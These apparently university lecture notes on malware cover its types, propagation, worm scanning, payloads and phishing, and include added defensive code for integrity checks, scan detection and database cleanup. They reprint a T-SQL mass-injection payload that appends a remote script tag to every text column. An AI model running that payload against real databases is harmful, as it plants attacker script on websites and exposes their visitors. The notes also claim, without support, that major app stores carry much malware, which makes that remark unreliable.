Tip: If anyone wants to speed up the lecture videos a little,
inspect the page, go to the browser console, and paste this in:
document.querySelector('video').playbackRate = 1.2
1.2 Definitions
Malware is software that is installed onto a system, usually
covertly, with the intent of compromising the confidentiality,
integrity, or availability of the victim’s data, applications, operating
system, hardware, peripherals, sensors, or otherwise annoying or
disrupting the victim.
Classified by:
How it spreads or propagates to reach the desired targets
Actions or payloads it performs once a target is reached
Also classified by:
Those that need a host program (parasitic code such as viruses)
Those that are independent, self-contained programs (worms, trojans, and bots)
Malware that does not replicate (trojans and spam e-mail)
Malware that does replicate (viruses and worms)
1.2.2 Types
Types of Malicious Software (Malware)
Propagation mechanisms include:
Infection of existing content by viruses that is subsequently spread to other systems
Exploitation of software vulnerabilities by worms or drive-by-downloads to allow the malware to replicate
Social engineering attacks that convince users to bypass security mechanisms to install Trojans or to respond to phishing attacks
Payload actions performed by malware once it reaches a target system can include:
Corruption of system or data files
Theft of service, which can make the system a zombie agent of attack as part of a botnet
Theft of information from the system, e.g., key-logging
Code for stealthing, i.e., hiding its presence on the system (not exclusive of the other payloads; it complements them)
1.3 Attack sources
Individuals just tinkering
Hacktivists
More organized and dangerous attack sources such as politically motivated attackers, organized criminals, organizations selling services to nations or companies, and government agencies
More resources and motivation behind malware has led to the development of a large underground economy involving the sale of attack kits, access to compromised hosts, and stolen information
1.3.1 Advanced Persistent Threats (APTs)
Well-resourced, persistent application of a wide variety of intrusion technologies and malware to selected targets (usually business or political)
Typically attributed to state-sponsored organizations and criminal enterprises
Differ from other types of attack by their careful target selection and stealthy intrusion efforts over extended periods
High profile attacks include Aurora, RSA, APT1, and Stuxnet
1.3.1.1 APT Characteristics
Advanced
Use a wide variety of intrusion technologies and malware, including the development of custom malware if required
Individual components may not necessarily be technically advanced but are carefully selected to suit the chosen target
Persistent
Determined application of attacks over an extended period against the chosen target
A variety of attacks may be progressively applied until the target is compromised
Threats
Organized, capable, and well-funded attackers intent on compromising the specifically chosen targets
Active involvement of people in the process greatly raises the threat level above that of automated attack tools, and also the likelihood of successful attacks
1.3.1.2 APT Attacks
Aim:
Varies from theft of intellectual property or security-related data to the physical disruption of infrastructure, ultimately often for the purpose of resource acquisition and theft, the business of organized crime and nation states.
Techniques used:
Social engineering
Spear-phishing e-mail
Drive-by-downloads from selected compromised websites likely to be visited by personnel in the target organization
Intent:
To infect the target with sophisticated malware with multiple propagation mechanisms and payloads
Once they have gained initial access to systems in the target organization, a further range of attack tools is used to maintain and extend their access
1.3.1.3 APT examples
Two examples from organized entities with a monopoly on violence and
profit-driven interest in power by force:
Check out the source code from a successful example:
https://en.wikipedia.org/wiki/Carbanak
“A look under the hood of FIN7’s notorious Carbanak backdoor, the result
of nearly 500 total hours of analysis across 100,000 lines of code, and
dozens of binaries, shows that the malware is highly sophisticated, more
sophisticated than expected. It’s a Cadillac in a sea of golf carts, if
you will. That’s according to analysis from FireEye researchers, who
said that notably, the malware (which has been used in hundreds if not
thousands of successful, financially motivated cyberattacks in the past
four years) has an entirely different approach to command-and-control
(C2) communication than what’s typically seen in the wild.”
Malware has moved from a hobbyist industry into a profitable, high-throughput production industry.
1.4.1 Historical
Initially the development and deployment of malware required
considerable technical skill by software authors.
1.4.2 Attack kits
The development of virus-creation tool-kits in the early 1990s, and then of more general attack kits in the 2000s, greatly assisted the development and deployment of malware
Tool-kits are often known as “crime-ware”
They include a variety of propagation mechanisms and payload modules that even novices can deploy
The variants that attackers can generate using these tool-kits create a significant problem for those defending systems against them
Widely used tool-kits include Zeus, Blackhole, Sakura, and Phoenix, if you are interested…
1.5 Propagation
How does malware get around?
This is a commonly misunderstood area, even among the technologically literate.
1.5.1 Viruses
Piece of software that infects programs
Modifies them to include a copy of the virus
Replicates and goes on to infect other content
Easily spread through network environments
When attached to an executable program, a virus has the permissions of that program
Executes secretly when the host program is run
Specific to operating system and hardware
1.5.1.1 Virus features
Infection mechanism
Means by which a virus spreads or propagates
Also referred to as the infection vector
Trigger
Event or condition that determines when the payload is activated or delivered
Sometimes known as a logic bomb
Usually executing downloaded software
Payload
What the virus does (besides spreading)
May involve damage, benign but noticeable activity, or hidden activity such as keylogging
1.5.1.2 Virus phases
These phases may overlap for a particular virus, but the general principles still apply:
Dormant
Virus is idle
Will eventually be activated by some event
Not all have this stage
Triggering
Virus is activated to perform the function for which it was intended
Can be caused by a variety of system events, usually launching a downloaded binary.
Propagation
Virus places a copy of itself into other programs or into certain system areas on the disk
The copy may not be identical to the propagating version
Each infected program will now contain a clone of the virus, which will itself enter a propagation phase
Execution
Function is performed (may be damaging or not)
1.5.1.3 Virus Classification by target
Boot sector infector: Infects a master boot record or boot record and spreads when a system is booted from the disk containing the virus, thus being more difficult to eliminate.
File infector: Infects files that the operating system or shell considers to be executable
Macro virus: Infects files with macro or scripting code that is interpreted by an application, e.g., a Microsoft Excel macro virus.
Multipartite virus: Infects files in multiple ways
1.5.1.4 Virus Classification by concealment strategy
Encrypted virus: A portion of the virus creates a random encryption key and encrypts the remainder of the virus, often for the purpose of stealthing
Stealth virus: A form of virus explicitly designed to hide itself from detection by anti-virus software
Polymorphic virus: A virus that mutates with every infection, often for the purpose of stealthing
Metamorphic virus: A virus that mutates and rewrites itself completely at each iteration and may change behavior as well as appearance, often for the purpose of stealthing
Often, one might notice that an infected binary file has changed in size.
But compression can mask changes in file size.
To know that a file has not been infected, one detection mechanism is to compare hashes (e.g., SHA-256) between a known-good state and the suspect binary.
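The hash comparison just described, as an added example that is not part of the original notes. It records a (size, SHA-256) baseline for a file while the system is known good, then checks a suspect copy against it. The sample "binaries" are constructed byte strings, not real executables: one tampered copy has exactly the same size as the original, so the size check alone misses it while the hash does not.

```python
import hashlib
import os
import tempfile

# Constructed stand-ins for a known-good binary and two suspect copies.
# They are not real executables; only their bytes matter here.
KNOWN_GOOD = b"\x7fELF" + b"\x00" * 60 + b"original code section"
# Same length as KNOWN_GOOD: a size check alone cannot tell these apart.
TAMPERED_SAME_SIZE = b"\x7fELF" + b"\x00" * 60 + b"ORIGINAL CODE SECTION"
# Longer copy: a size check catches this one, but the hash catches both.
TAMPERED_LARGER = KNOWN_GOOD + b"appended payload"


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def record_baseline(paths):
    """Record (size, sha256) for each file while the system is in a known-good state.
    The baseline must be kept somewhere the suspect system cannot rewrite it
    (offline media, or a signed file on another host)."""
    return {p: (os.path.getsize(p), sha256_file(p)) for p in paths}


def check_file(baseline, path):
    """Compare a file's current size and hash with its baseline entry."""
    base_size, base_hash = baseline[path]
    return {
        "size_changed": os.path.getsize(path) != base_size,
        "hash_changed": sha256_file(path) != base_hash,
    }


def demo():
    """Write the constructed sample to a temp dir, baseline it, then overwrite
    it with each tampered version and check it against the baseline."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "tool.bin")
        with open(path, "wb") as f:
            f.write(KNOWN_GOOD)
        baseline = record_baseline([path])
        results["unchanged"] = check_file(baseline, path)
        for label, data in (("same_size", TAMPERED_SAME_SIZE), ("larger", TAMPERED_LARGER)):
            with open(path, "wb") as f:
                f.write(data)
            results[label] = check_file(baseline, path)
    return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(label, verdict)
```

The point of the baseline comment is practical: a hash list stored on the same disk as the binaries it protects can be rewritten by the same malware that modified the binaries, so the known-good state has to live somewhere the suspect system cannot change.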
Macro and Scripting Viruses
For example, basic spreadsheet macro viruses
Very common in mid-1990s
Platform independent
Infect documents (not executable portions of code)
Easily spread
Exploit macro capability of MS Office applications
More recent releases of products include protection
Various anti-virus programs have been developed so these are no
longer the predominant virus threat
1.5.2 Worms
Program that actively seeks out more machines to infect; each infected machine serves as an automated launching pad for attacks on other machines
Exploits software vulnerabilities in client or server programs
Can use network connections to spread from system to system
Spreads through shared media (USB drives, CD, DVD data disks)
E-mail worms spread in macro or script code included in attachments and instant messenger file transfers
Upon activation the worm may replicate and propagate again
Usually carries some form of payload
First known implementation was done at Xerox Palo Alto Labs in the early 1980s
1.5.2.1 Worm Replication
Electronic mail or instant messaging: Worm e-mails a copy of itself to other systems, or sends itself as an attachment via an instant message service
File sharing: Creates a copy of itself or infects a file as a virus on removable media
Remote execution capability: Worm executes a copy of itself on another system
Remote file access or transfer capability: Worm uses a remote file access or transfer service to copy itself from one system to the other
Remote login capability: Worm logs onto a remote system as a user and then uses commands to copy itself from one system to the other
1.5.2.2 Target Discovery
First function in the propagation phase for a network worm
Searches for other systems to infect
Ask/discuss:
What does this mean for leaving legacy computers on the internet,
even if they are not used?
Must a computer be used by a human to be infected?
1.5.2.3 Scanning strategies
Random
Each compromised host probes random addresses in the IP address space using a different seed
Produces a high volume of Internet traffic, which may cause generalized disruption even before the actual attack
Hit list
Attacker compiles a list of potentially vulnerable machines
Once the list is compiled the attacker begins infecting machines on the list
Each infected machine is given a portion of the list to scan
Results in a very short scanning period, which may make it difficult to detect the infection
Topological
This method uses information contained on an infected victim machine to find more hosts to scan
Local subnet
If a host can be infected behind a firewall, that host then looks for targets in its own local network using the subnet address structure
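From the defender's side, random and local-subnet scanning both leave a signature in connection logs: one source contacting many distinct destinations in a short time. The following is an added example (not part of the original notes) of that detection over constructed flow records, with three sources: a normal host, a random scanner whose targets are spread across the address space, and a local-subnet scanner sweeping its own /24. The thresholds (20 distinct destinations within 60 seconds, 80% in the source's own /24) and the assumption that the source's /24 is its local subnet are illustrative choices, not values from the notes.

```python
import ipaddress
from collections import Counter, defaultdict


def make_sample_flows():
    """Constructed connection-attempt records (time_s, src, dst, dport), the kind
    of data a flow collector or firewall log provides. Three sources:
    a normal host, a random-scanning worm, and a local-subnet scanner."""
    flows = []
    for i in range(5):  # normal host: the same web server, a few times
        flows.append((i * 10.0, "10.0.1.5", "203.0.113.10", 443))
    for i in range(30):  # random scan: 30 addresses spread over the space, port 445, in 30 s
        dst = f"{(i * 37) % 223 + 1}.{(i * 53) % 256}.{(i * 11) % 256}.{(i * 7) % 250 + 1}"
        flows.append((i * 1.0, "10.0.1.20", dst, 445))
    for i in range(1, 31):  # local subnet sweep of 10.0.2.0/24 from 10.0.2.9, in 15 s
        flows.append((i * 0.5, "10.0.2.9", f"10.0.2.{i + 10}", 445))
    return flows


def detect_scanners(flows, window=60.0, min_targets=20, local_fraction=0.8):
    """Flag sources that contact at least min_targets distinct destinations within
    any window-second span, and label them by where the targets lie relative to
    the source's own /24 (assumed here to be its local subnet)."""
    by_src = defaultdict(list)
    for t, src, dst, _dport in flows:
        by_src[src].append((t, dst))
    verdicts = {}
    for src, recs in by_src.items():
        recs.sort()
        src_net = ipaddress.ip_network(f"{src}/24", strict=False)
        in_window = Counter()  # distinct destinations currently inside the sliding window
        best, best_local, j = 0, 0, 0
        for t, dst in recs:
            in_window[dst] += 1
            while recs[j][0] < t - window:  # expire records older than the window
                old = recs[j][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                j += 1
            if len(in_window) > best:
                best = len(in_window)
                best_local = sum(1 for d in in_window if ipaddress.ip_address(d) in src_net)
        if best >= min_targets:
            kind = "local_subnet" if best_local / best >= local_fraction else "random"
            verdicts[src] = {"kind": kind, "distinct_targets": best}
    return verdicts


if __name__ == "__main__":
    for src, verdict in detect_scanners(make_sample_flows()).items():
        print(src, verdict)
```

A hit-list worm is the case this logic handles worst: each infected host scans only its share of a pre-compiled list, so the per-source count may stay under the threshold, which is exactly the short-scanning-period point made above.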
1.5.2.4 Simple propagation model
Similar to real infection modeling, where infection confers functional immunity or death.
dI(t)/dt = B * I(t) * S(t)
I(t) = number of individuals infected as of time t
S(t) = number of susceptible individuals (susceptible to infection but not yet infected) at time t
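The model above, integrated numerically, as an added example that is not part of the original notes. It assumes a fixed population N with S(t) = N - I(t) (every host is either susceptible or infected, and nothing is patched or cleaned), which is the closed-population reading of the equation; under that assumption the equation is the logistic equation, so the closed-form time to infect half the population is included as a check on the simulation. The parameter names, the population size, and the value of B are illustrative.

```python
import math


def simulate_si(population, initially_infected, beta, dt, steps):
    """Forward-Euler integration of dI/dt = B * I(t) * S(t) with S(t) = N - I(t).
    Assumption: closed population, infected hosts stay infected.
    Returns I(t) at every step, starting with the initial value."""
    infected = float(initially_infected)
    history = [infected]
    for _ in range(steps):
        susceptible = population - infected
        infected += dt * beta * infected * susceptible
        infected = min(infected, float(population))  # cannot exceed the population
        history.append(infected)
    return history


def time_to_fraction(history, population, fraction, dt):
    """First simulated time at which I(t) reaches the given fraction of N, or None."""
    for step, infected in enumerate(history):
        if infected >= fraction * population:
            return step * dt
    return None


def analytic_half_time(population, initially_infected, beta):
    """Closed-form time to infect half the population for this model:
    the logistic solution I(t) = N / (1 + ((N - I0)/I0) * exp(-B*N*t))
    reaches N/2 at t = ln((N - I0)/I0) / (B*N)."""
    n, i0 = population, initially_infected
    return math.log((n - i0) / i0) / (beta * n)


if __name__ == "__main__":
    N, I0, B, DT = 10_000, 1, 1e-4, 0.01
    hist = simulate_si(N, I0, B, DT, steps=3000)
    print("initial growth rate B*N =", B * N, "per time unit")
    print("simulated time to 50% infected:", time_to_fraction(hist, N, 0.5, DT))
    print("analytic  time to 50% infected:", round(analytic_half_time(N, I0, B), 2))
    print("infected at t=30:", round(hist[-1]))
```

The product B*N is what matters early on: with one infected host, dI/dt is approximately B*N*I, so halving the susceptible population (patching, or isolating a subnet) halves the initial exponential growth rate, which is the lever defenders actually control in this model.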
After we decode it, we can see the code below.
What does this do?
DECLARE @T VARCHAR(255), @C VARCHAR(255)
-- Cursor over every text-typed column (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar) of every user table (xtype 'u')
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u'
    AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR(4000), [' + @C + ''])) + ''<script src=http://www.ibse.ru/js.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Goes through all character fields in a database and appends a script tag to each of them, loading a script from a remote URL on a Russian domain…
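The defender's counterpart to the payload above, as an added example that is not part of the original notes: walk the schema catalogue the same way (every text-typed column of every user table), but read-only, report values that contain an injected script tag, and remove the tag with a parameterised UPDATE. It uses SQLite's catalogue (sqlite_master and PRAGMA table_info) in place of sysobjects/syscolumns, and the sample database, its rows, and the malicious.example URL are constructed for the example.

```python
import re
import sqlite3

# Matches an injected <script ...>...</script> block like the one the payload appends.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# Declared column types that hold free text and are therefore worth scanning.
TEXT_TYPES = re.compile(r"^(TEXT|NTEXT|CHAR|NCHAR|VARCHAR|NVARCHAR)", re.IGNORECASE)


def quote_ident(name):
    """Quote a table/column name taken from the catalogue so that it is used
    as an identifier, never interpolated as SQL."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(conn):
    """Yield (table, column) for every text-typed column in every user table:
    the same catalogue walk the payload performs, but read-only."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, col, decl_type, *_ in conn.execute(f"PRAGMA table_info({quote_ident(table)})"):
            if TEXT_TYPES.match(decl_type or ""):
                yield table, col


def find_injected_rows(conn):
    """Return [(table, column, rowid, value)] for values containing a <script> tag."""
    hits = []
    for table, col in text_columns(conn):
        sql = (f"SELECT rowid, {quote_ident(col)} FROM {quote_ident(table)} "
               f"WHERE {quote_ident(col)} LIKE ?")
        for rowid, value in conn.execute(sql, ("%<script%",)):
            if value is not None and SCRIPT_TAG.search(value):
                hits.append((table, col, rowid, value))
    return hits


def strip_injected_tags(conn, hits):
    """Remove the script tags from each hit with a parameterised UPDATE; returns rows changed."""
    changed = 0
    for table, col, rowid, value in hits:
        cleaned = SCRIPT_TAG.sub("", value)
        sql = f"UPDATE {quote_ident(table)} SET {quote_ident(col)} = ? WHERE rowid = ?"
        changed += conn.execute(sql, (cleaned, rowid)).rowcount
    conn.commit()
    return changed


def build_sample_db():
    """Constructed in-memory database: one row carries an injected tag, the others
    are clean, and the REAL column must never be scanned or touched."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name VARCHAR(255), description TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Blue widget", "A widget, in blue.", 9.99),
        ("Red widget", "A widget, in red.<script src=http://malicious.example/js.js></script>", 12.50),
        ("Manual", "Contains the word 'script' but no tag.", 3.00),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    found = find_injected_rows(db)
    print("injected values:", found)
    print("rows cleaned:", strip_injected_tags(db, found))
    print("remaining:", find_injected_rows(db))
```

Cleaning the rows is only half the fix: the payload got in through an application that concatenated user input into SQL, so the same scan should be re-run after the application has been changed to use parameterised queries, otherwise the tags simply come back.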
1.5.3 Mobile phone malware
Very much up-and-coming - the phone ecosystem is an insecure
mess!
First discovery was Cabir worm in 2004
Then Lasco and CommWarrior in 2005
Communicate through Bluetooth wireless connections or MMS
Target is the smartphone
Can completely disable the phone, delete data on the phone, or force the device to send costly messages
CommWarrior replicates by means of Bluetooth to other phones, sends itself as an MMS file to contacts, and sends itself as an auto-reply to incoming text messages
1.5.4 Mobile (cross-platform) code
This does NOT refer to mobile phone malware above
Programs that can be shipped unchanged to a variety of platforms
Transmitted from a remote system to a local system and then executed on the local system
Often acts as a mechanism for a virus, worm, or Trojan horse
Takes advantage of vulnerabilities to perform its own exploits
Popular vehicles include Java applets, ActiveX, JavaScript and VBScript
What about the user’s mistakes?
1.5.5 Drive-by-downloads
When the user views a website controlled by the attacker, the attacker's code exploits browser vulnerabilities to download and install malware on the user’s system.
In most cases does not actively propagate
Spreads when users visit the malicious Web page
1.5.6 Click-jacking
Also known as a user-interface (UI) redress attack
The front-end display of the browser can be modified to create illusory, deceptive content, often a form to fill in
Typically implemented with Adobe Flash or JavaScript
A typical attack uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page
Similarly, keystrokes can also be hijacked
A user can be led to believe they are typing the password to their e-mail or bank account, but are instead typing into an invisible frame controlled by the attacker
The attacker can force the user to do a variety of things, from adjusting the user’s computer settings to unwittingly sending the user to Web sites that might have malicious code
The attacker is hijacking clicks meant for one page and routing them to another page
1.5.7 Social engineering
The most successful type of attack by far!
Spam
Unsolicited bulk e-mail
Significant carrier of malware
Phishing and spear phishing
Trojan horse
Program or utility containing harmful hidden code
Used to accomplish functions that the attacker could not accomplish directly
Mobile phone trojans
Untrusted sources (This means most of the major app stores like Apple and Android, where a significant fraction of the software contains malware)
Cahoot-14.1
1.6 Payload
Malicious software or actions that malware may deliver or perform
1.6.1 System corruption
Real-world damage
Cause damage to physical equipment
Chernobyl virus rewrites BIOS code
Stuxnet worm
May target specific industrial control system software
There are concerns about using sophisticated targeted malware for
industrial sabotage
Logic bomb: Code embedded in the malware that is set to “explode”
when certain conditions are met
1.6.2 Bots
Takes over another Internet-attached computer and uses that computer to launch or manage attacks
Botnet: collection of bots capable of acting in a coordinated manner
Sality is the classification for a family of malicious software
(malware), which infects files on Microsoft Windows systems.
Sality was first discovered in 2003 and has advanced over the years
to become a dynamic, enduring and full-featured form of malicious
code.
Systems infected with Sality may communicate over a peer-to-peer
(P2P) network to form a botnet for the purpose of relaying spam,
proxying of communications, exfiltrating sensitive data, compromising
web servers and/or coordinating distributed computing tasks for the
purpose of processing intensive tasks (e.g. password cracking).
Since 2010, certain variants of Sality have also incorporated the
use of rootkit functions as part of an ongoing evolution of the malware
family.
Because of its continued development and capabilities, Sality is
considered to be one of the most complex and formidable forms of malware
to date.
1.6.3 Information Theft: key-loggers and Spyware
1.6.3.1 Key-loggers
Captures keystrokes to allow the attacker to monitor sensitive information
Typically uses some form of filtering mechanism that only returns information close to keywords (“login”, “password”)
1.6.3.2 Spyware
Subverts the compromised machine to allow monitoring of a wide range of activity on the system
Monitoring history and content of browsing activity
Redirecting certain Web page requests to fake sites
Dynamically modifying data exchanged between the browser and certain Web sites of interest
1.6.3.3 Phishing
Exploits social engineering to leverage the user’s trust by masquerading as communication from a trusted source
Includes a URL in a spam e-mail that links to a fake Web site that mimics the login page of a banking, gaming, or similar site
Suggests that urgent action is required by the user to authenticate their account
Attacker exploits the account using the captured credentials
1.6.3.4 Spear Phishing
Recipients are carefully researched by the attacker
E-mail is crafted to specifically suit its recipient, often quoting a range of information to convince them of its authenticity